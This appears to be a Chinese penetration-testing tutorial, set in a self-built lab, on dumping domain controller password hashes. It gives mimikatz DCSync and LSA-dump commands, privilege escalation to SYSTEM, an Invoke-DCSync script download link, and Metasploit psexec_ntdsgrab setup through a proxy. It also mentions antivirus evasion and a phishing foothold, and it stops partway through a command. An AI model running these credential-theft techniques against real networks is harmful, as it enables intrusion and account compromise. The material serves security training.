渗透测试之地基内网篇：域森林中域控制安全（下） – 作者:dayuxiyou

系列文章

专辑：渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

渗透测试人员需谨记《网络安全法》，根据《网络安全法》所示，未经授权的渗透测试都是不合法的，不管是出于何种目的。红队渗透人员在进行渗透期间，渗透测试的行为和项目必须在被渗透方授予权限可渗透后，才可进行渗透测试操作。

如今有一家dayu公司，需要对自己的业务以及整体的内网框架体系进行隐患挖掘，授予权限我进行对dayu公司的渗透测试操作，在签署了双方的《渗透测试授权书》后，我开始了对dayu公司的渗透之旅。

跳开思维讲，我此篇内容是内网渗透篇章，通过我的专栏：

社工钓鱼 -> 免杀过全杀软 -> 内网渗透 

那么我通过了社工钓鱼的各种方式，将钓鱼文件进行免杀后，成功钓鱼到了该公司外围人员计算机，并控制了该计算机权限获得shell，并成功登录对方电脑。

通过前期对域用户大量的信息收集，画出了相对应的简单网络拓扑图，下一步需要进攻子域控制器，思路如下：

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域

通过该思路进攻即可，还有另外一条思路：

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸（财务独立域10.10.21.0/24）

渗透人员最爱系统之一有kali，还有各类windows集成的武器库系统，通过上期隐藏通信隧道技术已经在内网域森林中建立了二级隧道，并在上期权限提升中将普通用户权限提升为system最高权限后，最后在上期对域森林进行横向移动后，今天我们就来对域森林中进行分析渗透域控制器能做些什么事情，总结实战中会遇到针对域控制器的各种方法，利用这些方法在内网中遨游！

不会域控制器安全的技术，就无法对内网机器进行进一步的渗透！！

二、环境介绍

目前信息收集获得的网络情况：（模拟环境）
拓扑图简介

为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况：

单篇：渗透测试之地基内网篇：域森林中父子域和辅域用户搭建分析

在通常情况下、即使拥有管理员权限，也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件，所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。

本节将介绍常用的提取ntds.dit文件的方法，并对非法提取ntds.dit文件、如何通过MS14-068漏洞攻击域控制器等方式方法进行演示！利用这些方法在域森林中旅行！

三、dcsync渗透域散列值

1、mimikatz转储域散列值

在横向移动期刊中已经介绍过mimikatz神器功能，以及在免杀期刊中已经介绍了如果免杀mimikatz，那么该工具的功能远不及此！

mimikaz有一个deyne功能，可以利用卷影拷贝服务直接读取ntds.dit文件并检索城散列值。需要注意的是，必须使用域管理员权限运行mimikatz才可以读取ntds.dit！

1）在域内的任意一台计算机，以管理员权限打开命令行环境

lsadump::dcsync /domain:xiyou.dayu.com /all /csv

成功导出域内所有用户名及散列值！

2）查看导出某个用户散列值

lsadump::dcsync /domain:xiyou.dayu.com /user:USER1$

导出机器用户USER1$中存在的所有散列值！

3）lsass导出所有散列值

转储lsass.exe进程对散列值进行Dump操作如果没有预先执行prvile::debug命令，将导致权限不足、读取失败。如果用户数量太多，mimikatz 无法完全将其显示出来，可以先执行log命令(会在mimikatz目录下生成一个文本文件，用于记录mimikaz的所有执行结果)。

privilege::debug
lsadump::lsa /inject

成功提取！

4）拓展思路小技巧

在低权用户情况下，如何将mimikatz提权至system权限呢：

将mimikatz免杀处理后上传至目标机器，在命令行中打开mimikatz
privilege::debug    #提升权限
token::elevate    #system权限

成功提权！！

2、dcsync获取域用户散列值

Invoke-DCSync.ps1可以利用desync直接读取ntds.dit，以获取域账号和域散列值！

下载地址：

https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1

输人”Invoke-DCSync-PWDumpFormat”命令(-PWDumpFormat参数用于对输出的内容进行格式化)

Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -PWDumpFormat

需要管理员或者system权限执行！配合小技巧执行即可！

四、Matasploit获取域散列值

Matasploit是什么，如何使用请查看我以往写的文章：

渗透测试-地基篇-后渗透Metasploit meterpreter篇（十八）

1、psexec_ntdsgrab模块

1）使用psexec_ntdsgrab模块

setg Proxies socks5:192.168.253.38:7700
setg ReverseAllowProxy true
#我使用了代理内网 穿透

use auxiliary/admin/smb/psexec_ntdsgrab

使用代理进行横向已经在上上期就说过了，这里调用psexec_ntdsgrab后直接查看底层的需求！

2）配置需求

set rhosts 10.10.3.6
set SMBdomain xiyou.dayu.com
set SMBUSER "xiyou1\administrato

来源：freebuf.com 2021-04-27 16:05:32 by: dayuxiyou